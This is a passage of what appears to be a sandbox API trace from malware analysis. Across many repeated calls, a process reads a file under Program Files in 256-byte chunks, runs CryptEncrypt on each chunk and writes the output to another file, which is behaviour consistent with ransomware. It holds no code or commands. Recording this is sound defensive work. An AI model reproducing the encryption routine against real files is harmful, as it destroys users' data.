dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c4 [0169.543] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbvbs.inc"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15b0 [0169.544] GetFileSizeEx (in: hFile=0x15b0, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=9975) returned 1 [0169.544] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0169.545] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.546] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.546] GetLastError () returned 0x0 [0169.546] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.595] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.597] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.597] GetLastError () returned 0x0 [0169.597] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.597] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.597] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.597] GetLastError () returned 0x0 [0169.597] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.597] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.597] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.597] GetLastError () returned 0x0 [0169.597] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.598] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.598] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.598] GetLastError () returned 0x0 [0169.598] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.598] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.598] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.598] GetLastError () returned 0x0 [0169.598] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.598] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.598] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.598] GetLastError () returned 0x0 [0169.598] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.598] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.598] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.598] GetLastError () returned 0x0 [0169.598] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.598] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.598] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.598] GetLastError () returned 0x0 [0169.598] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.599] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.599] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.599] GetLastError () returned 0x0 [0169.599] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.599] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.599] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.599] GetLastError () returned 0x0 [0169.599] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.599] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.599] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.599] GetLastError () returned 0x0 [0169.599] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.599] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.599] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.599] GetLastError () returned 0x0 [0169.599] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.599] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.600] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.600] GetLastError () returned 0x0 [0169.600] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.600] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.600] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.600] GetLastError () returned 0x0 [0169.600] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.600] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.600] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.600] GetLastError () returned 0x0 [0169.600] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.600] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.600] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.626] GetLastError () returned 0x0 [0169.626] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.626] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.626] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.626] GetLastError () returned 0x0 [0169.626] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.626] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.627] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.627] GetLastError () returned 0x0 [0169.627] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.627] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.627] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.627] GetLastError () returned 0x0 [0169.627] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.627] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.627] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.627] GetLastError () returned 0x0 [0169.627] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.627] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.627] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.627] GetLastError () returned 0x0 [0169.627] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.627] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.627] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.627] GetLastError () returned 0x0 [0169.627] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.627] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.627] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.627] GetLastError () returned 0x0 [0169.627] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.627] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.628] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.628] GetLastError () returned 0x0 [0169.628] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.628] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.628] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.628] GetLastError () returned 0x0 [0169.628] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.628] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.628] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.628] GetLastError () returned 0x0 [0169.628] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.628] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.628] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.628] GetLastError () returned 0x0 [0169.628] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.628] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.628] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.628] GetLastError () returned 0x0 [0169.628] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.628] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.628] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.628] GetLastError () returned 0x0 [0169.628] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.628] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.628] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.628] GetLastError () returned 0x0 [0169.628] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, 